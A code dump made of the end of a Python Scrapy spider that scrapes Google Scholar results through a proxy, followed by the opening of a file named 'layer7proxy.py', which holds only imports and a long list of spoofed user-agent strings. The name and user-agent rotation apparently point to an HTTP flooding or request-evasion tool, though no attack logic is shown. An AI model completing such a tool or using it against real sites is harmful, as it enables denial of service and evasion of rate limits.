paper = {'title': title, 'authors': authors, 'journal': journal, 'year': year,
'snippet': snippet, 'detailsLink': "None", 'links': links, 'citations': citations, 'citationsLink': citations_link,
'relatedLink': related_link, 'versions': versions, 'versionsLink': versions_link,}
output.append(paper)
yield paper
next_page = response.xpath('//td[@align="left"]/a/@href').extract_first()
if next_page:
url = "https://scholar.google.com" + next_page
# yield scrapy.Request(url, callback=self.parse,meta={'position': position})
yield scrapy.Request(get_url(url), callback=self.parse,meta={'position': position})
# Receive arguments from HTTP request
default_query = ['Residual learning']
query = request.args.get('q') if request.args.get('q')!=None else default_query
paper_count = request.args.get('paper_count') if request.args.get('paper_count')!=None else 10
custom_settings = {'CLOSESPIDER_ITEMCOUNT':f'{paper_count}',}
# Instantiate and run spider
process = CrawlerProcess(custom_settings)
process.crawl(SearchResultsSpider, query = query)
process.start()
queue.put(None)
# Check for errors in process and add to queue
except Exception as e:
queue.put(e)
queue = Queue()
manager = Manager()
output = manager.list()
# Wrapping the spider in a child process
main_process = Process(target=script, args=(queue, output,))
main_process.start()
main_process.join()
# Display error checking results
result = queue.get()
if result is not None:
raise result
return json.dumps(list(output))
service = request.args.get('svc')
if service == 'search_results':
return SearchResultsScraper(request)
elif service == 'paper_details':
return "ERROR: Paper details not found for Google Scholar"
else:
return "ERROR: Service request invalid"
|
layer7proxy.py
|
import urllib.request
import re
import random
from bs4 import BeautifulSoup
import threading
useragents=["AdsBot-Google ( http://www.google.com/adsbot.html)",
"Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)",
"Baiduspider ( http://www.baidu.com/search/spider.htm)",
"BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103",
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0)",
"BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0",
"BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100",
"BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105",
"BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102",
"BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0",
"BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123",
"Bloglines/3.1 (http://www.bloglines.com)",
"CSSCheck/1.2.2",
"Dillo/2.0",
"DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"DoCoMo/2.0 SH901iC(c100;TB;W24H12)",
"Download Demon/3.5.0.11",
"ELinks/0.12~pre5-4",
"ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)",
"ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)",
"EmailWolf 1.00",
"everyfeed-spider/2.0 (http://www.everyfeed.com)",
"facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)",
"FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)",
"FeedFetcher-Google; ( http://www.google.com/feedfetcher.html)",
"Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php)",
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
"Googlebot-Image/1.0",
"Googlebot-News",
"Googlebot-Video/1.0",
"Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua)",
"grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org)",
"Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)",
"HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0",
"HTMLParser/1.6",
"iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2)",
"iTunes/9.0.2 (Windows; N)",
"iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)",
"Java/1.6.0_13",
"Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0",
"Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode)",
"LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1",
"LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"libwww-perl/5.820",
"Links/0.9.1 (Linux 2.4.24; i386;)",
"Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)",
"Links (2.1pre15; Linux 2.4.26 i686; 158x61)",
"Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)",
"Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12",
"Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d",
"Mediapartners-Google",
"Microsoft URL Control - 6.00.8862",
"Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) ",
"MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0",
"MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0",
"MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0",
"Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1",
"Mozilla/2.02E (Win95; U)",
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
"Mozilla/3.01Gold (Win95; I)",
"Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS)",
"Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180)",
"Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )",
"Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; winfx; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0) ",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0",
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
"Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]",
"Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)",
"Mozilla/4.8 [en] (Windows NT 5.1; U)",
"Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)",
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1",
"Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) ",
"Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1)",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu)",
"Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0",
"Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12",
"Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13",
"Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0",
"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145",
"Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3",
"Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941",
"Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 ",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (PLAYSTATION 3; 1.10)",
"Mozilla/5.0 (PLAYSTATION 3; 2.00)",
"Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0",
